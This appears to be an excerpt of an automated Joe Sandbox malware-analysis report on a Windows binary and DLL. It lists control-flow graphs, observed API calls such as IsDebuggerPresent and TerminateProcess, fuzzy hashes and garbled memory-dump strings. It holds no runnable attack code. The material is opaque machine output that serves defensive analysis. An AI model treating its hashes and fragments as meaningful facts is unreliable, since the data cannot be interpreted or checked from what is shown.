                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize___scrt_uninitialize_crt
                                                                        • String ID:
                                                                        • API String ID: 2442719207-0
                                                                        • Opcode ID: 50af062b7347531ad3bb99e538ed1de99081caff9134240d0a273de03134abd3
                                                                        • Instruction ID: a0752bd1ce438a94c726f3b209881549fc2cee9298e9c659690267a83e1d37b5
                                                                        • Opcode Fuzzy Hash: 50af062b7347531ad3bb99e538ed1de99081caff9134240d0a273de03134abd3
                                                                        • Instruction Fuzzy Hash: 1041C87AE05214EBDB918F69D801B9E3A75EB4175CF11811AE924E7B70D7708D078BE0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 676 6cd96d78-6cd96d89 call 6cd97530 679 6cd96d8b-6cd96d91 676->679 680 6cd96d9a-6cd96da1 676->680 679->680 681 6cd96d93-6cd96d95 679->681 682 6cd96dad-6cd96dc1 dllmain_raw 680->682 683 6cd96da3-6cd96da6 680->683 686 6cd96e73-6cd96e82 681->686 684 6cd96e6a-6cd96e71 682->684 685 6cd96dc7-6cd96dd8 dllmain_crt_dispatch 682->685 683->682 687 6cd96da8-6cd96dab 683->687 684->686 685->684 688 6cd96dde-6cd96df0 call 6cd96370 685->688 687->688 691 6cd96e19-6cd96e1b 688->691 692 6cd96df2-6cd96df4 688->692 694 6cd96e1d-6cd96e20 691->694 695 6cd96e22-6cd96e33 dllmain_crt_dispatch 691->695 692->691 693 6cd96df6-6cd96e14 call 6cd96370 call 6cd96cc8 dllmain_raw 692->693 693->691 694->684 694->695 695->684 697 6cd96e35-6cd96e67 dllmain_raw 695->697 697->684
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                        • String ID:
                                                                        • API String ID: 3136044242-0
                                                                        • Opcode ID: 4ebe2d26887b4f524a4b3ffce7e2fe23b4810ab75bb335bcdb86ac0398ac90d5
                                                                        • Instruction ID: aca7d26774f5191ef0570b5ad713fa50ec2a91c960c5b924d0a3bedec32a6a65
                                                                        • Opcode Fuzzy Hash: 4ebe2d26887b4f524a4b3ffce7e2fe23b4810ab75bb335bcdb86ac0398ac90d5
                                                                        • Instruction Fuzzy Hash: 3721717AD05615EBDBA14F55C840AAF3A79EB81B9CF058119F824E7A30D330CD138BE0

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • __RTC_Initialize.LIBCMT ref: 6CD96C0E
                                                                          • Part of subcall function 6CD9708B: InitializeSListHead.KERNEL32(6CDF4798,6CD96C18,6CDA60D8,00000010,6CD96BA9,?,?,?,6CD96DD1,?,00000001,?,?,00000001,?,6CDA6120), ref: 6CD97090
                                                                        • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CD96C78
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                        • String ID:
                                                                        • API String ID: 3231365870-0
                                                                        • Opcode ID: 3b2b523a264434a53b72476d638ad430c0a67aebf788198440e59c33bd4aa8eb
                                                                        • Instruction ID: ac0a94dfb0eb4143df44ec549103765860f826663c8ab5557b384a24a161c3d2
                                                                        • Opcode Fuzzy Hash: 3b2b523a264434a53b72476d638ad430c0a67aebf788198440e59c33bd4aa8eb
                                                                        • Instruction Fuzzy Hash: C921A139609240EAEF416BF4E9117DD3B61EF022ACF11045AE554A6FF1DB22504E86F5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 818 6cd9b9ed-6cd9b9f2 819 6cd9b9f4-6cd9ba0c 818->819 820 6cd9ba1a-6cd9ba23 819->820 821 6cd9ba0e-6cd9ba12 819->821 823 6cd9ba35 820->823 824 6cd9ba25-6cd9ba28 820->824 821->820 822 6cd9ba14-6cd9ba18 821->822 825 6cd9ba93-6cd9ba97 822->825 828 6cd9ba37-6cd9ba44 GetStdHandle 823->828 826 6cd9ba2a-6cd9ba2f 824->826 827 6cd9ba31-6cd9ba33 824->827 825->819 829 6cd9ba9d-6cd9baa0 825->829 826->828 827->828 830 6cd9ba53 828->830 831 6cd9ba46-6cd9ba48 828->831 833 6cd9ba55-6cd9ba57 830->833 831->830 832 6cd9ba4a-6cd9ba51 GetFileType 831->832 832->833 834 6cd9ba59-6cd9ba62 833->834 835 6cd9ba75-6cd9ba87 833->835 836 6cd9ba6a-6cd9ba6d 834->836 837 6cd9ba64-6cd9ba68 834->837 835->825 838 6cd9ba89-6cd9ba8c 835->838 836->825 839 6cd9ba6f-6cd9ba73 836->839 837->825 838->825 839->825
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 6CD9BA39
                                                                        • GetFileType.KERNELBASE(00000000), ref: 6CD9BA4B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FileHandleType
                                                                        • String ID:
                                                                        • API String ID: 3000768030-0
                                                                        • Opcode ID: 85c77a94a9ada414a3ec717f3ac7d31cac3b1a92f41a99d1d8df44e84655e540
                                                                        • Instruction ID: 64d7a202bc15e87b9b4728aba7e6d0e8927378ea93c01304c96adb5bd5ae5dfc
                                                                        • Opcode Fuzzy Hash: 85c77a94a9ada414a3ec717f3ac7d31cac3b1a92f41a99d1d8df44e84655e540
                                                                        • Instruction Fuzzy Hash: 8A11B43A608752EAD7304F3ECCC4716FAE4A753238B36075AD1F6C69F1C6B0D5869241

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 840 6cd9c250-6cd9c25b 841 6cd9c25d-6cd9c262 840->841 842 6cd9c264-6cd9c266 840->842 843 6cd9c26a 841->843 844 6cd9c268 842->844 845 6cd9c26f-6cd9c272 call 6cd99fb6 842->845 843->845 844->843 847 6cd9c277-6cd9c28d call 6cd9a013 845->847 850 6cd9c2ba-6cd9c2bd 847->850 851 6cd9c28f-6cd9c2b3 call 6cd99fb6 call 6cd9a013 847->851 853 6cd9c2c2-6cd9c2f5 call 6cd9b7e2 850->853 851->850 863 6cd9c2b5-6cd9c2b9 851->863 858 6cd9c300 853->858 859 6cd9c2f7-6cd9c2fa 853->859 862 6cd9c307-6cd9c311 858->862 859->858 861 6cd9c2fc-6cd9c2fe 859->861 861->858 861->862 862->853 864 6cd9c313-6cd9c317 862->864
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: bf815d3a1a396ff24a162b9a7d45427b429736d33a21d63d25a5578fa07bfb0a
                                                                        • Instruction ID: 37e43ecb1daaabdd93bbb2fd202e6c0fe4927bf92ad88ef271ec2a024005a58f
                                                                        • Opcode Fuzzy Hash: bf815d3a1a396ff24a162b9a7d45427b429736d33a21d63d25a5578fa07bfb0a
                                                                        • Instruction Fuzzy Hash: 5111C876B05300DAEB10AF69AE00B4673B9B782B39F150316F635CBAE4D3B4D88A4251

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 865 6cd99fb6-6cd99fc1 866 6cd99fcf-6cd99fd5 865->866 867 6cd99fc3-6cd99fcd 865->867 869 6cd99fee-6cd99fff RtlAllocateHeap 866->869 870 6cd99fd7-6cd99fd8 866->870 867->866 868 6cd9a003-6cd9a00e call 6cd99fa3 867->868 875 6cd9a010-6cd9a012 868->875 871 6cd99fda-6cd99fe1 call 6cd9ca15 869->871 872 6cd9a001 869->872 870->869 871->868 878 6cd99fe3-6cd99fec call 6cd9bbd5 871->878 872->875 878->868 878->869
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CD99BB9,00000001,00000364,00000013,000000FF,?,00000001,6CD99FA8,6CD9A039,?,?,6CD9924C), ref: 6CD99FF7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 2098154b8b04e1b23b1c484343b91671b25a94ea9c3267ee8cf3e95de2bd2988
                                                                        • Instruction ID: f22937b2dcdf39a496bc4bc876ac1287deba7904e11cd5833655ce9d5d52dd56
                                                                        • Opcode Fuzzy Hash: 2098154b8b04e1b23b1c484343b91671b25a94ea9c3267ee8cf3e95de2bd2988
                                                                        • Instruction Fuzzy Hash: A5F0BB3A609134AAEB125F669C00F8FB7989B82774B164111E81DE7AA4DB70D40586F1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 5[Y$8$CN$Lw$}~$SRQ$_]
                                                                        • API String ID: 0-3274379026
                                                                        • Opcode ID: 2ef088fb791fcb4b5d07652d7079772ea40ef3d6f1599daa881505971eba02cf
                                                                        • Instruction ID: 08a301f3285fa546200b8b3706abc013c32a2f12c98195f1db6cd06405054162
                                                                        • Opcode Fuzzy Hash: 2ef088fb791fcb4b5d07652d7079772ea40ef3d6f1599daa881505971eba02cf
                                                                        • Instruction Fuzzy Hash: 135111765193918BD324CF25C8912ABB7F3EFD2311F58895CE8C28B394EB749906C782
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: =3$C$E!q#$Lgfe$\$IK
                                                                        • API String ID: 0-2973044635
                                                                        • Opcode ID: 0c6124da53620af7279f1ed181df6a4729dfee9d6376ee642a2278ed5423e1b3
                                                                        • Instruction ID: 0741fa52ee2710997bdc7651d422b64ba5d382a3222259e41ecdbd776c9f484b
                                                                        • Opcode Fuzzy Hash: 0c6124da53620af7279f1ed181df6a4729dfee9d6376ee642a2278ed5423e1b3
                                                                        • Instruction Fuzzy Hash: D9223171A083019FE324CF24C845BABBBA6EF85714F148A2CF9959B381D775D909CB92
                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6CD973B6
                                                                        • IsDebuggerPresent.KERNEL32 ref: 6CD97482
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CD974A2
                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 6CD974AC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                        • String ID:
                                                                        • API String ID: 254469556-0
                                                                        • Opcode ID: b64d750f67b2bc940f6ae21dbfbcaf553ecf5a766ce32d8c19fd9c368fc48505
                                                                        • Instruction ID: ef3067f6be14a29722964efb25c7d31b60c462ef27c38e7318674b6e4d957418
                                                                        • Opcode Fuzzy Hash: b64d750f67b2bc940f6ae21dbfbcaf553ecf5a766ce32d8c19fd9c368fc48505
                                                                        • Instruction Fuzzy Hash: C8314B79D05218DBDF10DFA1D9897CDBBB8BF08304F10419AE40CAB250EB709A84CF54
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: +2/?$=79$BBSH$GZE^
                                                                        • API String ID: 0-3392023846
                                                                        • Opcode ID: 00fe1e064dcaa1da413347bfb472ac20779eab0912f43db2572b41facf3bac7f
                                                                        • Instruction ID: afc998383fee7a0123d305c78175881f8af823ef962f160c928b54bb666a3a24
                                                                        • Opcode Fuzzy Hash: 00fe1e064dcaa1da413347bfb472ac20779eab0912f43db2572b41facf3bac7f
                                                                        • Instruction Fuzzy Hash: 89521370504B418FC735CF39C8906A6BBE2BF56314F188A6DD4E68BB92CB35E846CB51
                                                                        APIs
                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CD99E32
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CD99E3C
                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CD99E49
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                        • String ID:
                                                                        • API String ID: 3906539128-0
                                                                        • Opcode ID: c9478162a562efd58aa724ea6c4e7ef5de05a3f1f293789845f271e9a6107c1c
                                                                        • Instruction ID: a297636f8c5debc204f7b775e1c8dcfa5e338db9f4b3cd78f98e785ce2aaf40c
                                                                        • Opcode Fuzzy Hash: c9478162a562efd58aa724ea6c4e7ef5de05a3f1f293789845f271e9a6107c1c
                                                                        • Instruction Fuzzy Hash: 4031D67491122CEBCB61DF65D9887CDBBB8BF08314F5042DAE51CA7260E7709B858F54
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(?,?,6CD98B34,?,00000001,?,?), ref: 6CD98B57
                                                                        • TerminateProcess.KERNEL32(00000000,?,6CD98B34,?,00000001,?,?), ref: 6CD98B5E
                                                                        • ExitProcess.KERNEL32 ref: 6CD98B70
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentExitTerminate
                                                                        • String ID:
                                                                        • API String ID: 1703294689-0
                                                                        • Opcode ID: 9bc7ef3aba0cbf5574cf91b0ed60dfa2d0e06a468aa9d7cdad8e399834caef43
                                                                        • Instruction ID: 64852dc0432c6d5630ad667cbf7cba394cb7f5bf4a02269bc1b24772615a31a6
                                                                        • Opcode Fuzzy Hash: 9bc7ef3aba0cbf5574cf91b0ed60dfa2d0e06a468aa9d7cdad8e399834caef43
                                                                        • Instruction Fuzzy Hash: 69E08C39100688EFCF016F91CD08E9D3B3DFB42A5AF044415FA0A86630CB39D982EB94
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @J$KP$VD
                                                                        • API String ID: 0-3841663987
                                                                        • Opcode ID: 9fa3d2b87a46f13b78e19f520b388da73002b2cea1f4d3e4d46194a187be3b61
                                                                        • Instruction ID: 8f837bb072964bd88a050895500f161e08737c8515995c66ca2732e22dc24a02
                                                                        • Opcode Fuzzy Hash: 9fa3d2b87a46f13b78e19f520b388da73002b2cea1f4d3e4d46194a187be3b61
                                                                        • Instruction Fuzzy Hash: EF3135B5904716AFD714CF29C881BAEFB72FB82314F588228D4256BB84C374A466CFD5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: /cc$/cc
                                                                        • API String ID: 0-1050529368
                                                                        • Opcode ID: 987da9d23fc150a67a53f72be21abe7cf30956df5ee96a9078fb4eff75aa5efa
                                                                        • Instruction ID: be4c78ddceb9b64871e12aab42b9848f3c629f27a95ae6cd809b347cd0344b1b
                                                                        • Opcode Fuzzy Hash: 987da9d23fc150a67a53f72be21abe7cf30956df5ee96a9078fb4eff75aa5efa
                                                                        • Instruction Fuzzy Hash: 5D12D039B441098FCB44CFBCD5906DDBBF2EB4A318F10C115E865EB7A8D62AD8068F95
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -b) $u5Ws
                                                                        • API String ID: 0-738638561
                                                                        • Opcode ID: 50ac6a3c4a4a86fc6bdfbd8e0ecb289fc3a2eeef33a76e7d4a43a30e94e25bec
                                                                        • Instruction ID: 2439798cde423d28bcd3cb4b09e0f2d4873b90bd8f1cf5730995a704e4900ab3
                                                                        • Opcode Fuzzy Hash: 50ac6a3c4a4a86fc6bdfbd8e0ecb289fc3a2eeef33a76e7d4a43a30e94e25bec
                                                                        • Instruction Fuzzy Hash: BA125C79E45209CFDB14CFACC588A9DBBF5FB4A308F20411AE469EBB65C635A805CF41
                                                                        APIs
                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CDA03BC,?,?,00000008,?,?,6CDA0054,00000000), ref: 6CDA05EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionRaise
                                                                        • String ID:
                                                                        • API String ID: 3997070919-0
                                                                        • Opcode ID: 69592285e1c7e2b1443b3a57c3a800b283d23025aafc61ce3c87387c6c1d92ce
                                                                        • Instruction ID: cac881801a1fb5ede36928fafe38d13c5f104728600ac3acbb52e9ad4de6f60c
                                                                        • Opcode Fuzzy Hash: 69592285e1c7e2b1443b3a57c3a800b283d23025aafc61ce3c87387c6c1d92ce
                                                                        • Instruction Fuzzy Hash: 47B14831611648CFDB05CF68C486B957BA0FF453A8F258658E8EACF6B1C335E992CB40
                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CD9758E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FeaturePresentProcessor
                                                                        • String ID:
                                                                        • API String ID: 2325560087-0
                                                                        • Opcode ID: 7b05d317cee7cde3cc68f5092bb8c0531d2fd28d439d76b2544094da22b7b5a2
                                                                        • Instruction ID: 3d31bf6cc4981e0f9598b4bcfcc659e156caa9083fe6102645c0b293b8bb1792
                                                                        • Opcode Fuzzy Hash: 7b05d317cee7cde3cc68f5092bb8c0531d2fd28d439d76b2544094da22b7b5a2
                                                                        • Instruction Fuzzy Hash: 5851DCB5B01215EFEB04CFA9D9917AEBBF4FB09318F22852AC521EB650D3749940CF90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 5|iL
                                                                        • API String ID: 0-1880071150
                                                                        • Opcode ID: 119d9b564c58e3664755373a27b7c1bd2dcc34c2ad9583fe8ec6af8b9e8f19ec
                                                                        • Instruction ID: a3c41aca2572ecbb84f0b56ea5f557cea8274eaffd188e1bda431daec28a2e47
                                                                        • Opcode Fuzzy Hash: 119d9b564c58e3664755373a27b7c1bd2dcc34c2ad9583fe8ec6af8b9e8f19ec
                                                                        • Instruction Fuzzy Hash: B071F936A053208BC7149F398C8069BB7A7EBC6724F158A6CD9E4A7390D771DD0287C5
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: HeapProcess
                                                                        • String ID:
                                                                        • API String ID: 54951025-0
                                                                        • Opcode ID: ca4aec982a2a4b2d2f33e14bca3c9d57d466865a64e6e5f3ae2d359e413b357d
                                                                        • Instruction ID: 9701f252095eede9270ec973f657899e13f57950b7d9a7c0d243923dfb636ca5
